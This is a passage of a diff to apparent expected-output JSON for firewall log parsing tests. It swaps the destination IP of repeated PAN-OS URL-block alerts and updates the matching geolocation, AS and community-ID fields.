"192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -8706,7 +8766,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:hYoXMUwV0cAKhYUb4hSHsLUSo1s=" + "community_id": "1:krwQMCJQ69EvT0SHwvfkUr7UpLM=" } }, "threat_category": "unknown", @@ -8751,8 +8811,8 @@ ], "network": { "community_id": [ - "1:0TIOUPyQekmpFSgX6VlMP7asdJs=", - "1:hYoXMUwV0cAKhYUb4hSHsLUSo1s=" + "1:N/dieAql5TxCzoXNfgzjIJkZKbw=", + "1:krwQMCJQ69EvT0SHwvfkUr7UpLM=" ], "transport": "tcp", "application": "ssl", @@ -8791,14 +8851,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768219536Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691939100Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -8821,26 +8881,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8856,14 +8918,14 @@ "port": 53127, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -8878,7 +8940,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:al192CljLcXBQ5a9fXhiLM+uAKg=" + "community_id": "1:/CVEkbQULGxkJj6Z7PCr6c76/+Y=" } }, "threat_category": "unknown", @@ -8923,8 +8985,8 @@ ], "network": { "community_id": [ - "1:5CeaDtLLJAW4qpNe5rR3zJ3u1KM=", - "1:al192CljLcXBQ5a9fXhiLM+uAKg=" + "1:mMXXWxoydTVkrT5GSCKjPfEs+Ag=", + "1:/CVEkbQULGxkJj6Z7PCr6c76/+Y=" ], "transport": "tcp", "application": "ssl", @@ -8963,14 +9025,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768223502Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691944200Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -8993,26 +9055,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9028,14 +9092,14 @@ "port": 53128, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -9050,7 +9114,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:qI8dj7I/HOk1zkz/wkZBjQ/igsw=" + "community_id": "1:CrsrsZSjYZ4DxsKX0qy4aUQ8Bqw=" } }, "threat_category": "unknown", @@ -9095,8 +9159,8 @@ ], "network": { "community_id": [ - "1:HYgrk1tiJGzjAjdHLQJ54QqqEH0=", - "1:qI8dj7I/HOk1zkz/wkZBjQ/igsw=" + "1:IXdaoAX41Q9+A/P7vOfsMZGvSe0=", + "1:CrsrsZSjYZ4DxsKX0qy4aUQ8Bqw=" ], "transport": "tcp", "application": "ssl", @@ -9135,14 +9199,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768227388Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691950600Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -9165,26 +9229,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9200,14 +9266,14 @@ "port": 53129, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -9222,7 +9288,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:NTrpQ6lfrWcfRCXSB/tQ49z7sOQ=" + "community_id": "1:FfabT8YJw+xGwcSbNocI/5KIsaE=" } }, "threat_category": "unknown", @@ -9267,8 +9333,8 @@ ], "network": { "community_id": [ - "1:8k83tpdWoK7nNJrq4t81UXuScHA=", - "1:NTrpQ6lfrWcfRCXSB/tQ49z7sOQ=" + "1:NOaYZTE87p2BjesLu4fOReXUCYA=", + "1:FfabT8YJw+xGwcSbNocI/5KIsaE=" ], "transport": "tcp", "application": "ssl", @@ -9307,14 +9373,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768231308Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691957100Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -9337,26 +9403,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9372,14 +9440,14 @@ "port": 53130, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -9394,7 +9462,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:93oplAL+YibXq75Qng9iomHp97k=" + "community_id": "1:f/tx3aSbV1g/ORMuTaQEvAiV7sY=" } }, "threat_category": "unknown", @@ -9439,8 +9507,8 @@ ], "network": { "community_id": [ - "1:Ob0VEjF8YeGq1hR7SbX0pZ+5/EI=", - "1:93oplAL+YibXq75Qng9iomHp97k=" + "1:QzX3ERgxyivLA9Tg1tQMwPWMqQc=", + "1:f/tx3aSbV1g/ORMuTaQEvAiV7sY=" ], "transport": "tcp", "application": "ssl", @@ -9479,14 +9547,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768235269Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691963500Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -9509,26 +9577,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9544,14 +9614,14 @@ "port": 53131, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -9566,7 +9636,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:uhEHJXnnMaxBL0QYfNxS8lxZkls=" + "community_id": "1:7hy0Gbrooax3fD1r1xzG6SzBU4g=" } }, "threat_category": "unknown", @@ -9611,8 +9681,8 @@ ], "network": { "community_id": [ - "1:WlDGM7WbDrN83JffZtwB6PNK3Y8=", - "1:uhEHJXnnMaxBL0QYfNxS8lxZkls=" + "1:vgG87dR8hXsX7hyNB8Z/GnCJM/o=", + "1:7hy0Gbrooax3fD1r1xzG6SzBU4g=" ], "transport": "tcp", "application": "ssl", @@ -9651,14 +9721,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768239142Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691969800Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -9681,26 +9751,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9716,14 +9788,14 @@ "port": 53132, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -9738,7 +9810,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:KtlZO5BbsoCg/ymqE05xAvw/iIA=" + "community_id": "1:gAz+t48WkiSa9egQm/6gcOLfWIk=" } }, "threat_category": "unknown", @@ -9783,8 +9855,8 @@ ], "network": { "community_id": [ - "1:U5qBRasQ13RQONeFOyA2+9QbWK8=", - "1:KtlZO5BbsoCg/ymqE05xAvw/iIA=" + "1:Z0YPbs0b9YgyTFb8OV3rfi467Rc=", + "1:gAz+t48WkiSa9egQm/6gcOLfWIk=" ], "transport": "tcp", "application": "ssl", @@ -9823,14 +9895,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768243067Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691976100Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -9853,26 +9925,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9888,14 +9962,14 @@ "port": 53133, "ip": "192.168.15.224" }, - "message": 